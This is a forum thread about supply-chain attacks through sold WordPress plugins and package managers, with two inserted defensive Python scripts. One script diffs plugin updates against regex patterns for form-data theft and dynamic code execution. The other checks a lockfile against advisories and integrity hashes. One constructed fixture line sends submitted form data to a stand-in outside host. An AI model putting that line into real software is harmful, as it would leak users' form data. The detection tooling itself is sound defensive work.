Let's trust random third parties and put their code on our server without any review!
-
Two nice links for your Friday read. (And if it isn't Friday for you right now, go fuck a pinecone).
First, the theoretical. How easily can someone poison npm to harvest form data, and get away unnoticed?
Second, the actual. Supply Chain Attack. Bad actors are going around and buying up moderately popular but unmaintained Wordpress plug-ins. The authors of those plugins will almost always sell, because fuck it, it's code I don't use anymore, and someone wants to give me $500, sure? And since most people will just blindly update a plugin, instead of grabbing the source and doing a diff-- well, now you have a backdoor for your botnet to grow into.
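The "grab the source and do a diff" step the post recommends can be automated so it happens on every plugin or package update rather than never. The script below is an added example, not code from the thread: it diffs a reviewed version of a package against the update candidate and flags added lines that a form-harvesting or phone-home backdoor typically needs (new outbound requests, reads of form data, dynamic code execution, long encoded literals), plus any file that appeared or vanished. The two versions are constructed in-memory file trees; a real run would read two extracted source directories.

```python
"""Screen a plugin/package update before installing it: diff the old, reviewed
version against the new one and flag additions worth a human look.
Added example; the file trees below are constructed, not a real plugin."""
import difflib
import re

# Patterns that should draw a reviewer's eye when they appear in ADDED lines.
# Constructed list covering PHP plugins and browser-side JS; tune per ecosystem.
SUSPICIOUS = {
    "outbound request": re.compile(
        r"\b(curl_exec|wp_remote_post|file_get_contents\s*\(\s*['\"]https?://"
        r"|fetch\(|XMLHttpRequest|navigator\.sendBeacon)"),
    "form/credential access": re.compile(
        r"(\$_POST|\$_REQUEST|document\.forms|\.serialize\(\)|\bFormData\b)"),
    "dynamic code execution": re.compile(
        r"\b(eval|base64_decode|create_function|gzinflate)\s*\("),
    "obfuscated literal": re.compile(r"['\"][A-Za-z0-9+/]{80,}={0,2}['\"]"),
}


def screen_update(old: dict, new: dict) -> list:
    """Return (file, category, line) findings for every added line in `new`
    that matches a suspicious pattern, plus one finding per new/removed file.
    `old` and `new` map relative path -> file contents."""
    findings = []
    for path in sorted(new):
        new_lines = new[path].splitlines()
        if path not in old:
            # A brand-new file in a minor update deserves a look on its own.
            findings.append((path, "new file", ""))
            added = new_lines
        else:
            diff = difflib.unified_diff(old[path].splitlines(), new_lines,
                                        lineterm="", n=0)
            # Keep only '+' content lines, not the '+++' file header.
            added = [l[1:] for l in diff
                     if l.startswith("+") and not l.startswith("+++")]
        for line in added:
            for category, pattern in SUSPICIOUS.items():
                if pattern.search(line):
                    findings.append((path, category, line.strip()))
    for path in sorted(set(old) - set(new)):
        findings.append((path, "file removed", ""))
    return findings


# Constructed sample: a contact-form plugin whose "maintenance" release starts
# forwarding submitted form data to an outside host.
OLD = {
    "plugin.php": "<?php\nfunction contact_form() {\n    return render_form();\n}\n",
    "readme.txt": "Contact form plugin 1.2\n",
}
NEW = {
    "plugin.php": ("<?php\nfunction contact_form() {\n"
                   "    wp_remote_post('https://example.invalid/c', ['body' => $_POST]);\n"
                   "    return render_form();\n}\n"),
    "readme.txt": "Contact form plugin 1.3\n",
    "assets/helper.js": "document.forms[0].addEventListener('submit', e => fetch('/x'));\n",
}

if __name__ == "__main__":
    for path, category, line in screen_update(OLD, NEW):
        print(f"{path:20} {category:24} {line}")
```

Nothing here proves malice; it only turns "someone should have looked" into a short list of exactly where to look, which is the part that never happens when updates are applied blindly.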
-
@lorne-kates This is a risk with any package manager, not just npm. And it could be even worse with something like nuget because it's not always open source, so you don't really know for sure what they are doing. You just read the reviews and number of downloads and think it's a perfectly legit library (which is almost always is, to be fair, but there is some blind faith involved with some of the lesser known owners of the libraries there). Nuget does do some vetting of their submissions, but I've found that these kinds of analysis is done more on the initial submission, and then they go through a more streamlined process with each update, which may have things go through the cracks.
If your .NET stuff is server-side you can at least mitigate this risk with firewalls and traffic analytics to ensure there aren't any fishy outgoing requests. If you're doing client-side or desktop software, your best bet is to just do testing with fiddler to see if there's any phoning home from your adopted libraries. Obviously hardly anyone does this level of testing, but it might be something to consider if you are dealing with PII and other sensitive data.
-
@the_quiet_one While it certainly can be an issue in nuget for all those reasons, you can get away with a lot fewer dependencies. Keeping track of 3-4 dependencies is a very different thing from keeping track of the 100,000 included by that one function you imported with npm.
And I know, this is a difference in practice, not a difference in capability: If you use some new version of a Microsoft package that uses features from a framework version you don't have, they will helpfully get you packages that implement all of it. But even then, you're essentially getting more Microsoft packages, and you can bet those are carefully vetted.
My point with all of this echoes a point that I think blakey has made, though I can't remember for sure, so I won't attribute him directly: having most of your stuff come from .NET and not NuGet is less difficult than the equivalent in pretty much anything else you use, and is a really good thing.
-
@lorne-kates said in Let's trust random third parties and put their code on our server without any review!:
because fuck it, it's code I don't use anymore, and someone wants to give me $500, sure?
How irresponsible. Do some research before selling, and if you discover the buyer is going to inject malware, ask for $2,000.
-
@anonymous234 said in Let's trust random third parties and put their code on our server without any review!:
irresponsible.
Yes, it is a problem (and the information posted here is just the tip of the iceberg). One thing that helps is to use available tooling that analyzes the package/code usage and reports on known issues. Properly done, this can stop code that uses these packages from ever making it into your repositories.
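The "stop it from ever making it into your repositories" idea is a policy gate that runs on the lockfile before a dependency change can merge. The example below is added here and is not code from the thread or from any commercial product it mentions: it walks a package-lock.json-shaped structure, refuses any pinned version that falls inside a known advisory range, and recomputes the npm-style `sha512-` integrity digest of the artifact that will actually be installed so a swapped tarball is caught even when the version number is unchanged. The lockfile, the advisory feed and the tarball bytes are all constructed inline; a real gate reads the repository's package-lock.json, an advisory feed and the downloaded tarballs.

```python
"""Dependency policy gate: block a lockfile change if any pinned package has a
known advisory or its recorded integrity hash does not match the artifact.
Added example; lockfile, advisories and artifacts below are constructed."""
import base64
import hashlib


def parse_version(v: str) -> tuple:
    """'1.2.10' -> (1, 2, 10) so ranges compare numerically, not as strings."""
    return tuple(int(part) for part in v.split("."))


def sri_sha512(data: bytes) -> str:
    """Subresource-Integrity style digest as npm records it: 'sha512-' + base64."""
    return "sha512-" + base64.b64encode(hashlib.sha512(data).digest()).decode()


# Constructed advisory feed: package -> [(first affected, first fixed, id)].
ADVISORIES = {
    "form-helper": [("1.0.0", "1.2.1", "ADV-EXAMPLE-1")],
}


def affected(name: str, version: str, advisories=ADVISORIES) -> list:
    """Advisory ids whose [affected, fixed) range contains this version."""
    return [adv_id for lo, hi, adv_id in advisories.get(name, [])
            if parse_version(lo) <= parse_version(version) < parse_version(hi)]


def gate(lockfile: dict, artifacts: dict, advisories=ADVISORIES) -> list:
    """Return blocking problems; an empty list means the change may merge.
    `artifacts` maps package name -> bytes of the tarball that was downloaded."""
    problems = []
    for key, entry in lockfile["packages"].items():
        # Lockfile v2/v3 keys look like 'node_modules/<name>' (nested deeper
        # for transitive deps); the last path segment is the package name.
        name = key.split("node_modules/")[-1]
        version = entry["version"]
        for adv_id in affected(name, version, advisories):
            problems.append(f"{name}@{version}: known issue {adv_id}")
        data = artifacts.get(name)
        if data is None:
            problems.append(f"{name}@{version}: artifact not available for verification")
        elif sri_sha512(data) != entry["integrity"]:
            problems.append(f"{name}@{version}: integrity mismatch, "
                            "downloaded artifact differs from the pinned one")
    return problems


# Constructed tarball bytes standing in for the real archives.
FORM_HELPER_TGZ = b"form-helper 1.1.0 tarball bytes (constructed)"
LEFT_PAD_TGZ = b"left-pad-ish 0.9.0 tarball bytes (constructed)"

# Constructed lockfile in package-lock.json v3 shape, pinned to the above bytes.
LOCKFILE = {"lockfileVersion": 3, "packages": {
    "node_modules/form-helper": {"version": "1.1.0",
                                 "integrity": sri_sha512(FORM_HELPER_TGZ)},
    "node_modules/left-pad-ish": {"version": "0.9.0",
                                  "integrity": sri_sha512(LEFT_PAD_TGZ)},
}}

# What the build actually fetched: same version of left-pad-ish, different bytes.
ARTIFACTS = {
    "form-helper": FORM_HELPER_TGZ,
    "left-pad-ish": LEFT_PAD_TGZ + b"\n// appended after the pin was recorded",
}

if __name__ == "__main__":
    for problem in gate(LOCKFILE, ARTIFACTS):
        print("BLOCK:", problem)
```

Run as a pre-merge check, a non-empty result fails the job; the known-issue half only helps with issues that are already published, which is exactly the limit the next reply points out, while the integrity half catches an artifact that changed under an unchanged version regardless of whether anyone has written it up.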
-
@thecpuwizard ...until some clever haxx0r comes up with an unknown issue, of course.
-
@masonwheeler said in Let's trust random third parties and put their code on our server without any review!:
@thecpuwizard ...until some clever haxx0r comes up with an unknown issue, of course.
Of course, but some of the commercial products are really good :)
Also don't forget about internal hackers - lots of cases where in house developers have hidden malicious code. So adding a mix of these tools to the armory has a benefit there also.
-
@thecpuwizard said in Let's trust random third parties and put their code on our server without any review!:
but some of the commercial products are really good
Of course, if you know what commercial product your target uses, you can get a pirated copy and tweak your malware until it passes.
-
Pfft, I'm already trusting my CPU to Intel, OS to Microsoft, and phone to Google.
From there it can only get better.
-
@anonymous234 said in Let's trust random third parties and put their code on our server without any review!:
@thecpuwizard said in Let's trust random third parties and put their code on our server without any review!:
but some of the commercial products are really good
Of course, if you know what commercial product your target uses, you can get a pirated copy and tweak your malware until it passes.
VERY hard to do. The "tweaks" are almost certain to invalidate at least one of the signatures and change it to "Unverified" rather than "Passing".